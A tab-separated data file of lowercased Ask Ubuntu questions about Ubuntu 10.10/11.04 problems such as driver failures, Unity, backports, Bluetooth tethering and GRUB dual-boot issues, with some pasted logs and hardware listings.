29930	how do i recover from upgrading while using bad version of gcc/binutils ?	i upgraded from 9.04 to 10.10 a couple of days ago , and things are really messed up - x is crashing constantly . since then , i had an application segfault for no reason , when i was debugging , i found that it was strlen ( ) that was causing the segfault ( pointing to libc being the problem ) ! upon investigation , i found that it was because i had a bad version of gcc and binutils installed in /usr/bin/local ; i removed it , recompiled the application , and it no longer crashes . now , looking at my logs , i see that x is also crashing due to libc . backtrace : 0 : /usr/bin/x11/x ( xorg_backtrace+0x3b ) [ 0x80ef31b ] 1 : /usr/bin/x11/x ( 0x8048000+0x5d00d ) [ 0x80a500d ] 2 : ( vdso ) ( __kernel_rt_sigreturn+0x0 ) [ 0xb77e240c ] 3 : /usr/bin/x11/x ( 0x8048000+0xbb0b6 ) [ 0x81030b6 ] 4 : /usr/bin/x11/x ( 0x8048000+0xbc3ef ) [ 0x81043ef ] 5 : /usr/bin/x11/x ( 0x8048000+0x26ee7 ) [ 0x806eee7 ] 6 : /usr/bin/x11/x ( 0x8048000+0x1a5da ) [ 0x80625da ] 7 : /lib/libc.so.6 ( __libc_start_main+0xe7 ) [ 0xb750ace7 ] 8 : /usr/bin/x11/x ( 0x8048000+0x1a1b1 ) [ 0x80621b1 ] segmentation fault at address 0x32156654 caught signal 11 ( segmentation fault ) . server aborting so , how can i recover from this ?
29931	microsoft money alternative ?	i 'm looking for something to replace my ms money 2004 application . i 've tried kmymoney which seems pretty simple ( that 's good ! ) but it ca n't import the ofc files i get from my bank , so i would have to enter everything manually = not good . i 've tried gnucash which does import ofc files but i ca n't wrap my mind around this double-entry philosophy . it may be good for accounting but not for home use . i 've tried to make ms money run in wine with some success but it was hard to make it work and i 'd have to re-do that on my new machine . this is still a useful alternative for me though ... is there a similar tool that can import ofc files and that does n't do double-entry accounting ? tax capability is not needed for me , i only do after-tax numbers . some nice dashboard views ( upcoming bills , future cash flow , total net worth ) and some graphs would be a definite bonus ! update : i 'm in austria ( europe ! ) so purely us-based tools like mint are n't relevant . also , i really do mean ofc format , not ofx . i have to use whatever my bank offers , even if some say it 's an old format .
29932	how install an application with apt-get and restrict it to a specific repo source ?	i used to do something similar with yum on centos . i think there was a -- enable-repo and -- disable-repo param . is there something that exists for apt-get install < some pkg > that will restrict to /etc/apt/sources.list.d/ < somefile > ?
29940	can i stop specific 'devices ' from showing up in nautilus ?	nautilus seems to list all partitions under `` devices '' . on my system , this includes a windows 7 partition and a `` system reserved '' partition created by windows . i would prefer to hide those two partitions . is it possible ?
29942	how can i break out of ssh when it locks ?	i frequently ssh into my box at home from school , but usually when i change classes and my computer suspends , the pipe will be broken . however , ssh simply locks up - ctrl+c , ctrl+z and ctrl+d have no effect . it 's annoying to have to restart my terminal , and even more annoying to have to close and re-create a new screen window . so my question , is there an easy way to make ssh die properly ( i.e . when the pipe fails `` normally '' it will exit with a message about a broken pipe ) ? or do i have to figure out what the pid is and manually kill it ?
29950	wireless on an atheros ar9285 is slow and disconnects	i installed ubuntu on my notebook yesterday . all right except wi-fi connection . i found wi-fi network ( based on d-link dir-300 ) and connected . but it works too slow and disconnect every 1-3 minutes . you can say that maybe problem is in connection but on my notebook i have windows 7 and ubuntu 10.10 and in windows i have no such problem . windows works well with wi-fi . but ubuntu ... i have : dsl internet connection . modem is connected to router . router connected with desktop by wire and with notebook samsung r528 by wifi . router - d-link dir-300 . rusult of lspci -k is : network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : foxconn international , inc. device e025 kernel driver in use : ath9k kernel modules : ath9k thanks for any help ! p.s . i wrote this message from windows 7 . i edited this message from ubuntu but i see that internet works more slower than in windows 7 . firefox on winddows 7 loads this page in ~ 2-3 seconds firefox on ubuntu 10.10 loads this page in ~ 20 seconds
29957	radeon mobility hd 5470 not working	i recently bought a new hp dv6-3118sa laptop , but i am having a very discouraging problem with the graphics card . the graphics card is radeon mobility hd 5470 . it does n't install by default , but i do get some message suggesting to install the driver . if i install that driver , the next time i reboot , the screen goes blank and that 's it ! the same happens if i install the proprietary driver ( fglrx ) from ati website . could you please help me with this ? edit : following @ ronald and @ oli advice , i am dumping the output of lspci -k : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) subsystem : hewlett-packard company device 144a kernel driver in use : agpgart-intel kernel modules : intel-agp 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) subsystem : hewlett-packard company device 144a kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : hewlett-packard company device 144a 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : hda intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel modules : i2c-i801 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : intel ips kernel modules : intel_ips 01:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd 5000 series ] subsystem : hewlett-packard company device 144a kernel driver in use : radeon kernel modules : radeon 01:00.1 audio device : ati technologies inc manhattan hdmi audio [ mobility radeon hd 5000 series ] subsystem : hewlett-packard company device 144a kernel driver in use : hda intel kernel modules : snd-hda-intel 02:00.0 network controller : ralink rt3090 wireless 802.11n 1t/1r pcie subsystem : hewlett-packard company device 1453 kernel driver in use : rt2800pci kernel modules : rt2860sta , rt2800pci 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 144a kernel driver in use : r8169 kernel modules : r8169 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 144a
29958	how do i make ubuntu not ask me for my password ?	i 'm confident that i do not need a password for my computer . how do i remove passwords for things like when the screensaver activates and installing software ?
29959	ubuntu sofware centre does not download packages when connected to cisco vpn	i am not able to download packages through ubuntu software centre when connected to cisco vpn . however , i am able to do the same from synaptic by adding proxy settings . how do i make ubuntu software centre to make use of the same settings as synaptic package manager ?
29961	why are only some versions of the kernel backported to certain releases ?	with regard to kernels and backports , i noted a backported kernel available to 10.04 lts builds , slightly older than the cutting-edge kernels in 10.10 . any reason for a lack of backports for them ? ( although the currently backported kernel for lucid is 2.6.35 , > = 2.6.36 is newer and seems to be in the 10.10 and later repositories )
29969	is there a unity equivalent of the gnome panel 'show desktop ' applet ?	i miss the symbol to show the desktop with just one click when using unity instead of the classic desktop . is there a possibility to get the `` show desktop '' applet or an equivalent ? there is a bug report on : bug # 681348 ( `` add 'show me the desktop ' keyboard or unity dock shortcut '' ) can people suggest any workarounds in the mean-time ?
29973	how can i put a shortcut to a file in the unity launcher ?	is it possible to put a shortcut to a file ( like a application launcher but opens a file instead of launching a program ) in the unity launcher , and if so , how ?
29974	how do i set up a virtual private network in virtualbox ?	i am trying to set up a vpn in a virtual box machine running ubuntu 10.10 . all attempts so far have failed and even when i set up the vpn it keeps saying failed connection . any help at all here would be much appreciated .
29983	is the top panel in unity currently transparent by default ?	is the top panel of unity transparent or solid by default at the moment ?
29984	wireless not working with a ralink rt3090	i recently bought a new hp dv6-3118sa laptop , but i am having a very discouraging problem with wireless lan . it simply does n't work ! could you please help me with this ? output of lspci -k : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) subsystem : hewlett-packard company device 144a kernel driver in use : agpgart-intel kernel modules : intel-agp 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) subsystem : hewlett-packard company device 144a kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : hewlett-packard company device 144a 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : hda intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel modules : i2c-i801 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : intel ips kernel modules : intel_ips 01:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd 5000 series ] subsystem : hewlett-packard company device 144a kernel driver in use : radeon kernel modules : radeon 01:00.1 audio device : ati technologies inc manhattan hdmi audio [ mobility radeon hd 5000 series ] subsystem : hewlett-packard company device 144a kernel driver in use : hda intel kernel modules : snd-hda-intel 02:00.0 network controller : ralink rt3090 wireless 802.11n 1t/1r pcie subsystem : hewlett-packard company device 1453 kernel driver in use : rt2800pci kernel modules : rt2860sta , rt2800pci 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 144a kernel driver in use : r8169 kernel modules : r8169 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 144a 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 144a
29990	how to work around the home directory changing to /root when using sudo ?	with natty coming out soon , i 've been at work updating my deployment and self-config script to make my desktop on 11.04 run and look the way i want it to . one bummer is that dbus seems to have changed and does not permit , in the same manner lucid and maverick did , the authentication of the current user by terminal call using grep and cat . ideally , to run the script , i would sudo -s and then launch it as # chmod +x install & & ./install instead of returning my user name.. it now returns root and applies changes to the root profile and aborts whenever paths do not correspond . here is my script header : # ! /bin/bash on_user= $ ( echo ~ | awk -f'/ ' ' { print $ 1 $ 2 $ 3 } ' | sed 's/home//g ' ) export $ ( grep -v `` ^ # '' ~/.dbus/session-bus/`cat /var/lib/dbus/machine-id`-0 ) if sudo -u $ on_user test -z `` $ dbus_session_bus_address '' ; then eval `sudo -u $ on_user dbus-launch -- sh-syntax -- exit-with-session` fi release= $ ( lsb_release -cs ) how could i make it return the actual user now that natty is coming ? thanks for the help
29991	bluetooth dun tethering fails	i have an htc desire hd , with android froyo ( 2.2 ) and pdanet installed . i am using ubuntu 10.10 . i can not tether it over bluetooth either with network manager or blueman . ( note , i installed blueman only after failing with network manager , and i even tried the last version from the ppa ) . with both my device is discovered , paired , setup . but connecting always fail . network manager says it can not get the details of my device blueman says connection refused ( 111 ) here are some relevant entries from syslog . mar 11 22:13:00 tacone-macbook bluetoothd [ 2242 ] : bluetooth deamon 4.69 mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : starting sdp server mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : starting experimental netlink support mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : failed to find bluetooth netlink family mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : failed to init netlink plugin mar 11 22:13:00 tacone-macbook kernel : [ 158.284357 ] bluetooth : l2cap ver 2.14 mar 11 22:13:00 tacone-macbook kernel : [ 158.284361 ] bluetooth : l2cap socket layer initialized mar 11 22:13:00 tacone-macbook kernel : [ 158.446781 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 mar 11 22:13:00 tacone-macbook kernel : [ 158.446784 ] bluetooth : bnep filters : protocol multicast mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : hci dev 0 registered mar 11 22:13:00 tacone-macbook kernel : [ 158.569481 ] bluetooth : sco ( voice link ) ver 0.6 mar 11 22:13:00 tacone-macbook kernel : [ 158.569484 ] bluetooth : sco socket layer initialized mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : hci dev 0 up mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : starting security manager 0 mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : ioctl ( hciunblockaddr ) : invalid argument ( 22 ) mar 11 22:13:00 tacone-macbook kernel : [ 158.818600 ] bluetooth : rfcomm tty layer initialized mar 11 22:13:00 tacone-macbook kernel : [ 158.818607 ] bluetooth : rfcomm socket layer initialized mar 11 22:13:00 tacone-macbook kernel : [ 158.818610 ] bluetooth : rfcomm ver 1.11 mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : probe failed with driver input-headset for device /org/bluez/2242/hci0/dev_f8_db_7f_af_6b_ee mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : adapter /org/bluez/2242/hci0 has been enabled mar 11 22:13:00 tacone-macbook pulseaudio [ 1757 ] : bluetooth-util.c : error from listdevices reply : org.freedesktop.dbus.error.accessdenied mar 11 22:13:00 tacone-macbook networkmanager [ 1247 ] : < warn > bluez error getting adapter properties : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.4 '' ( uid=0 pid=1247 comm= '' networkmanager ) interface= '' org.bluez.adapter '' member= '' getproperties '' error name= '' ( unset ) '' requested_reply=0 destination= '' org.bluez '' ( uid=0 pid=2242 comm= '' /usr/sbin/bluetoothd ) ) mar 11 22:13:00 tacone-macbook bluetoothd [ 2243 ] : return_link_keys ( sba=00:23:6c : b5:03:6f , dba=00:23:6c : c0 : f1 : b0 ) mar 11 22:13:00 tacone-macbook pulseaudio [ 1757 ] : bluetooth-util.c : error from getproperties reply : org.freedesktop.dbus.error.accessdenied mar 11 22:15:02 tacone-macbook bluetoothd [ 2243 ] : discovery session 0x2262d7c0 with :1.45 activated mar 11 22:15:15 tacone-macbook bluetoothd [ 2243 ] : stopping discovery mar 11 22:15:15 tacone-macbook pulseaudio [ 1757 ] : bluetooth-util.c : error from getproperties reply : org.freedesktop.dbus.error.accessdenied mar 11 22:15:16 tacone-macbook bluetoothd [ 2243 ] : link_key_request ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee ) mar 11 22:15:16 tacone-macbook bluetoothd [ 2243 ] : io_capa_request ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee ) mar 11 22:15:17 tacone-macbook bluetoothd [ 2243 ] : io_capa_response ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee ) mar 11 22:15:18 tacone-macbook bluetoothd [ 2243 ] : stopping discovery mar 11 22:15:28 tacone-macbook bluetoothd [ 2243 ] : link_key_notify ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee , type=5 ) mar 11 22:15:28 tacone-macbook kernel : [ 306.585725 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:15:28 tacone-macbook kernel : [ 306.630757 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:15:28 tacone-macbook bluetoothd [ 2243 ] : authentication requested mar 11 22:15:28 tacone-macbook bluetoothd [ 2243 ] : link_key_request ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee ) mar 11 22:15:28 tacone-macbook kernel : [ 306.784829 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:15:28 tacone-macbook kernel : [ 306.857861 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:15:29 tacone-macbook bluetoothd [ 2243 ] : probe failed with driver input-headset for device /org/bluez/2242/hci0/dev_f8_db_7f_af_6b_ee mar 11 22:15:29 tacone-macbook pulseaudio [ 1757 ] : bluetooth-util.c : error from getproperties reply : org.freedesktop.dbus.error.accessdenied mar 11 22:15:29 tacone-macbook pulseaudio [ 1757 ] : last message repeated 8 times mar 11 22:15:29 tacone-macbook bluetoothd [ 2243 ] : stopping discovery mar 11 22:15:30 tacone-macbook modem-manager : ( tty/rfcomm0 ) : could not get port 's parent device mar 11 22:15:30 tacone-macbook modem-manager : ( rfcomm0 ) opening serial device ... mar 11 22:15:30 tacone-macbook modem-manager : ( rfcomm0 ) : probe requested by plugin 'generic' mar 11 22:15:43 tacone-macbook modem-manager : ( rfcomm0 ) closing serial device ... mar 11 22:15:43 tacone-macbook modem-manager : ( rfcomm0 ) opening serial device ... mar 11 22:15:49 tacone-macbook modem-manager : ( rfcomm0 ) closing serial device ... mar 11 22:16:15 tacone-macbook modem-manager : ( tty/rfcomm0 ) : could not get port 's parent device mar 11 22:16:19 tacone-macbook kernel : [ 357.375108 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:16:24 tacone-macbook bluetoothd [ 2243 ] : link_key_request ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee ) mar 11 22:16:24 tacone-macbook kernel : [ 362.169506 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:16:24 tacone-macbook kernel : [ 362.215529 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:16:24 tacone-macbook bluetoothd [ 2243 ] : link_key_request ( sba=00:23:6c : b5:03:6f , dba=f8 : db:7f : af:6b : ee ) mar 11 22:16:24 tacone-macbook kernel : [ 362.281559 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:16:24 tacone-macbook kernel : [ 362.330588 ] l2cap_recv_acldata : unexpected continuation frame ( len 0 ) mar 11 22:16:24 tacone-macbook modem-manager : ( tty/rfcomm0 ) : could not get port 's parent device any help ? ps : tethering via usb or wifi is not an option , i need to do it over bluetooth .
29992	stop sign in notification area instead of language icon	i have a `` stop sign '' instead of a language icon in my notification area . how can i fix it ? it also a stop sign instead of a language icon in the login window after suspend
29997	how to play minecraft classic ?	first off , i 've read through this question : how to install minecraft ? . i 'm interested in the free web-embedded version ( for demo purposes ) , not the paid and downloaded .jar file . i removed the open-java whatever that ubuntu prefers to use . i installed sun-java6-jre . then i ran sudo update-alternatives -- config java to ensure i was using sun 's java . restarted my browsers , then tried to start the game from : http : //www.minecraft.net/play.jsp it pops a prompt to make sure i really want to allow direct interaction between minecraft.net and my computer , i agree . the in browser display mumbles something about loading a library , then darkness . the page does n't crash , ps shows the java plugin process , all seems well except the game does n't load . i see the same behaviour on chromium 11.0.662.0 ( 73963 ) as firefox 4 rc1 .
30002	is there a way to get a `` proper '' firefox 4 experience on maverick ?	i 'm getting fed up of chrome 's crazy memory usage and quirks and i 'm tired of ff3 's sluggish performance . i 'd like to replace ff3 with ff4 . now i 've already installed it technically but the branding is completely off . it 's using its codename . is there a ppa of the latest releases ( not nightlies ) that comes with the proper branding and optionally a conflicts directive in its package so it clears out the old ff3 packages too .
30003	list linux kernel markers in alphabetical order	how can i get an alphabetical list of kernel markers from command-line ?
30007	what is the nm-applet and why does it take so much memory ?	i was wondering why my memory useage was so high , what is this thing that take a whopping 1.2gb of memory . please and thank you .
30011	can i modify power-management settings on a laptop running ubuntu server ?	it 's my first time running ubuntu server and i 'm trying to figure out a way to prevent the machine from going into suspend mode ( i 'm guessing ) when the lid is closed on the laptop . is it possible to stop the laptop from entering suspend mode when the lid is closed ? possibly without needing to install some gui package .
30012	can i backup my entire ubuntu installation to iso dvd ?	this is the third time i have installed ubuntu on my pc along with windows 7 , but every time i install , i have to upgrade all packages . ( almost 300 - 400 mb ) . is it possible to make a bootable dvd of my current installation so that i do n't have to upgrade all the packages next time ?
30015	time lag between software update and inclusion in the repositories	i noticed that there is a time lag of several days between a software update ( for example `` chromium '' ) and their inclusion in the repositories ! is there certain criteria that software has to meet , before ubuntu releases it into the repositories ?
30017	why is there a lack of backports of optional 10.10 or later packages in repos ?	this question is about backports again , but is specific to the difference in availability of packages . a specific example of this would be the two gcc packages in 10.10 's repos : gcc ( which is 4.4 ) , and gcc-4.5 ( which is gcc 4.5 ) . while this change is in 10.10 's repositories , such optional packages are n't included in the 10.04 lts repositories , and the option to have a gcc-4.5 compiler in 10.04 might help several people ( such as myself , who needs the 4.5 compiler for university , and i ca n't upgrade to 10.10 because it doesnt operate correctly on my system ) . is there a reason a lack of such optional packages is in the 10.04 repositories ?
30019	integrate a media-player into nautilus file browser	i wish to integrate gnome mplayer with nautilus file browser . you know , add : '' play with mplayer '' '' enqueue to mplayer '' could n't find how to do this . i just want for mp3 and other relevant music files to have a `` play/add '' option . and for directories ( regardless of contents '' to also have a `` play/add '' option . would appreciate your help . david : )
30020	advanced searching in tracker search tool ? filter by folders ?	i have checked several `` tracker search tool '' questions , but they all stop at very superficial usage . google , at least for me , did n't turn out anything either . i am using maverick , 10.10 . here is my situation and workflow : i am studying for a masters , and writing academic essays . through my university , i have access to multiple academic journals , and their articles are in pdf . so when i 'm writing one of my essays , this is what i do : i have all the pdf files that i found online , in a folder , organized in subfolders . i also have a few ebooks , in pdf format . and some articles in html and office .doc formats ( that i usually convert to .odt ) . as i write , i use tracker search tool to find and add references from within my downloaded articles and ebooks . it 's like having a mini-google within materials that i know i have , and that i know it 's academically appropriate . however , i work on several subjects , and right now , to use tracker search tool but limit the results to one of the subjects ( all the materials for that subject are in a specific folder ) , i need to stop tracker , delete the databases , change the indexed locations to the one specific to the current subject , and re-index everything . does the tracker search tool have any special syntax that i can use to limit results to a specific folder/subfolder within the indexed locations ? does anyone have a link to help on this specific tool ? the gnome page for the tracker project does n't have anything .
30022	how to install groovy ?	i do n't know how to install files to ubuntu . so kindly say me how to install groovy ?
30027	how do i ask for new features in ubuntu ?	i would like to know how to ask for new features in ubuntu .
30030	where is the groovy documentation ?	i have installed the groovy documentation from the ubuntu software centre , but where does it reside ? and how to view it ?
30032	how safe is ubuntu ?	last week i started desktop sharing using krfb . continuing from my last session , it appears that the process restarts itself . two days ago i noticed messages popping up saying something like `` rejecting uninvited connection from ( some ip ) '' , but today i figured it might be because of krfb , and i was right . krfb was running in the background . hence the question , how safe is ubuntu ? should i expect someone to connect to my computer and erase everything on my hard drive ? to extend my question : how safe is ubuntu compared to other oss ( windows , mac , ... ) ? how safe it is compared to other distros ? linked question why is ubuntu more secure than windows or mac os x ?
30037	how to get output from upstart jobs when logged in via ssh ?	to monitor what my job definitions are doing , i would like to see text output from the jobs . that does not seem to be possible when i am logged on via ssh . i am having this problem with natty 11.04 , but i am convinced that it is a more common one . a simple job file i use ( filename /etc/init/test.conf ) : description `` test '' start on test console owner kill timeout 5 task script /bin/echo gotcha ... end script my goal is to see the text `` gotcha ... '' when doing initctl emit test or initctl start test . but that does not work . what i have tried so far : '' console output '' instead of `` console owner '' '' exec /bin/echo gotcha ... '' instead of script ... end script
30038	how can i play mp4 and avi files in a movie player ?	i have installed ubuntu on my emachines . it works well , so far , although i am unable to play movie files which i have saved from my old windows installation . i am using the default movie player that comes with the ubuntu . i have seen other movie players in the software centre . should i install a new movie player ( if so , which ) or can i get the default movie player to play these files ?
30039	warning about ssl ceritificate , am i under attack ?	lately i 've been getting a lot of warnings about ssl certifications on my pc , empathy keeps telling me that facebook 's certificate is self-signed and ca n't be trusted , and also , there are occasional warnings in google-chrome about security . i remember the last one saying that that the page is secured but some of the resources that the page is using are not from a secure connection , something like that . is my pc hacked / under attack ? how can i check that , and if so , how can i safeguard myself ? ps : one thing that comes to my mind is that i might be under an arp poisoning / spoofing attack .
30043	how to use the package ttf-mscorefonts-installer	i have the package installed . now i want to use it to install the ms ttfonts , as stated in the description : '' this package allows for easy installation of the microsoft true type core fonts for the web including : [ list of fonts ] '' so , how do i install the fonts ?
30045	how come a daily build is behind snapshot releases like beta or rc ?	i installed firefox 4 from the daily builds ppa , and it does n't seem to be the latest rc , and tells me that i 'd better update to it . how come a daily build is behind snapshot releases like beta or rc ? i used the profile for my firefox 4 on windows , i had a few app tabs saved in the profile . what gives ? how do i get the firefox menu button to be orange or whatever color it 's supposed to be ?
30047	how can i boot from read-only filesystem while having writable partitions for logs ?	i want to mount my root filesystem as read-only on boot , and use separate writable partition for logs . is it necessary to create a ramfs image for such task ? how can i do this ?
30048	how can i create a bootable usb disk from a cd image ?	i have a bootable cd image that i would like to transfer to a usb stick , so that i can boot from it . the startup-disk creator does n't support it . how can i make a bootable usb disk from it ? the iso is quite old so that might be a problem .
30050	how is logitech c510 hd webcam	i am going to buy logitech c510 hd webcam and i just checked on other questions here on askubuntu that it works out of the box with cheese . jorge 's response also confirm this and i feel confident buying it now . my question is can it be limited in any functionality that i would like to do with it ? i would like it to be used with everything - skype , gtalk video chat , facebook , youtube etc . also this may sound lame but i need to know whether i could record or do a video call in lesser resolution video ( its a 720p one ) ? edit : ported part of this question to another question to make it more specific .
30053	can i use a desktop install as a server ?	i 'm new to linux and ubuntu is my first distribution . i have chosen ubuntu because i want to learn more about linux . i 'm under time constraints and need to setup a server as soon as possible . i have ubuntu desktop and ubuntu server setup via vmware fusion on my macbook pro . i installed everything i need on the server edition , but it feels way over my head . i have no experience with cli . can i just use ubuntu desktop to run my web server for the time being while i learn cli ? i basically need to run apache , php , mysql , phpmyadmin , python and django . should i be using mamp ? thanks .
30056	installing ubuntu , asks for user/pass	im trying to install ubuntu 10.10 64bit on my pc . unfortunately when i try to boot the installation from my usb-drive the installation begins with asking for a username and password.. i did n't set up a user or a password for that matter , so what username/pass should i fill in . i already tried to submit the form blank and with root / root but without success.. somebody knows what the right combination is or explain if i 'm a complete idiot for not understanding what to do.. thank you all !
30058	mounting linux partition after installing windows	i installed windows 7 and my grub is gone . i 'm trying to follow : https : //help.ubuntu.com/community/recoveringubuntuafterinstallingwindows but i ca n't mount my ubuntu partion . sudo fdisk -l device boot start end blocks id system /dev/sda1 * 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 13 4863 38958080 7 hpfs/ntfs /dev/sda3 4864 14594 78157825 5 extended /dev/sda5 14220 14594 2999296 82 linux swap / solaris gparted shows my extended partition as empty/unallocated space ( ? ? ? ) . how can i mount it ? sudo mount -t ext3 /dev/sda3 /media/ubuntu mount : wrong fs type , bad option , bad superblock on /dev/sda3 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
30061	how to install ubuntu one server software or alternative for personal use ?	i have a debian based box in my house that runs as a webserver , and a 4gb bootable usb-stick with ubuntu . i need to store stuff on a server and ubuntu one seems an ok way to go but i find that 2gb is not sufficient . i can most likely solve that when i install this server software . where can i find it - there is no ubuntu-one-server package or similar in the software centre . how can i install the ubuntu one server software or an alternative ?
30063	dual boot 10.10 and 11.04 ca n't boot into 10.10 after an update	i 've been dual booting my system with ubuntu 10.10 ( maverick meerkat ) and 11.04 ( natty narwhal ) but today after an update , i ca n't boot into 10.10 , there 's only option to boot into 11.04 and grub also looks a bit different . before this update , i used to see first option for 11.04 and an other option called /dev/sda1 for 10.10 but now there is a new option called previous linux versions , but when i enter into that menu , there is no option to boot into 10.10 all the options take me to 11.04 now it looks like this ... and when i click on previous linux versions ...
